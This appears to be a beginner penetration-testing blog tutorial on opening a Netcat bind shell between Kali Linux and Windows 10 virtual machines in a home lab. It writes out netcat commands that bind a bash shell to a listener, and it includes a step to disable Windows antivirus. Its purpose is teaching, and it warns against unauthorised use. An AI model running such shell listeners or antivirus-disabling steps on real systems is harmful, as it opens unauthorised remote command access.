How to create a bind shell between Windows 10 and Kali Linux using Netcat

In previous article we have created a shell between Kali Linux and Windows 10 virtual machines, but the problem was that we couldn't run commands.

This is the link to the previous article:

In this tutorial we're gonna find out how to create a bind shell between Kali Linux and Windows 10.

Note:

This is a beginner tutorial.

Note:

I'm creating this tutorial in my pentesting lab on my PC. Make sure to use this tutorial in a laboratory environment and not on someone else's computer without permission, Any attempt to break into computer systems without authority is illegal and can be pursued by law enforcement.

Note:

Before trying to get your hands dirty on this tutorial, make sure your system meets the requirements below.

Requirements:

• Kali Linux virtual machine.
• Windows 10 virtual machine.
• A shared network between above virtual machines. (Where each of these virtual machine can ping each other.)

Let's start

Step 1:

In Kali Linux virtual machine, open Terminal and type this command to go to windows binaries directory:

cd /usr/share/windows-binaries        

Step 2:

Now, We need to create a web server here, So type this command:

python3 -m http.server 8080        

This command will create an http server, that will be served on port 8080, and will be accessible by other virtual machines in the network on ip address of Kali Linux virtual machine, if the port 8080 is open on the Kali Linux virtual machine.

Step 3:

Now, disable the antivirus on Windows 10 virtual machine.

Step 4:

Now, open the browser on the Windows 10 machine, and as the IP address of my Kali Linux virtual machine is 192.168.10.10 and the port which we opened an http server on that is 8080, So enter this address:

192.168.10.10:8080        

You will see a page like this:

Now in the page shown above, click on nc.exe to download it.

You will see a page like above, Click on 3 dots menu besides the name of the file and click on keep, and then click on keep anyway.

Step 5:

Now, go back to Kali Linux and in the terminal type the command below, to create a netcat shell:

nc -n -l -v -p 1234 -e /bin/bash        

-n means to use IP address of the network interface.

-l means listening to inbound connections.

-v is verbose mode.

-p specifies the source port which here we put 1234.

-e means which local terminal we want to bind to the listener and here we have specified bash shell

You can use the command below too (the shorter version):

nc -nlvp 1234 -e /bin/bash        

And you can see something like this:

Step 6:

Now, go to Windows 10 and open CMD wherever you downloaded the nc.exe and enter this command:

nc.exe -nv 192.168.10.10 1234        

And you can see something like this:

Now the bind shell between Kali Linux and Windows 10 has been opened, And you can execute bash shell commands from Windows 10 onto Kali Linux, for example in CMD on Windows 10 enter this command:

whoami        

You will see something like this:

And as you can see it returned kali which is the username of Kali Linux virtual machine.

The problem:

Now we have created a bind shell between two virtual machine, But you can only run commands from Windows 10 and watching them executed on Kali Linux, What about a scenario that we want to run commands from Kali Linux ?

For this purpose we need a reverse shell, and I'll try to teach it to you in the next articles.